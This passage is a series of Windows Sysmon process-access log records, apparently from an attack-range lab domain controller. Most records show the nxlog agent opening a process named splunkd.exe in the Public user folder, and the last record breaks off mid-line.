{"EventTime":"2020-08-01 06:57:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6477,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:21.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:21.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6478,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:22.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:22.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6479,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:22.748\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001031CF0000}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:22.748","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001031CF0000}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6480,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:23.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:23.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6481,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:24.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:24.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6482,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:25.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:25.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6483,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:26.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:26.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 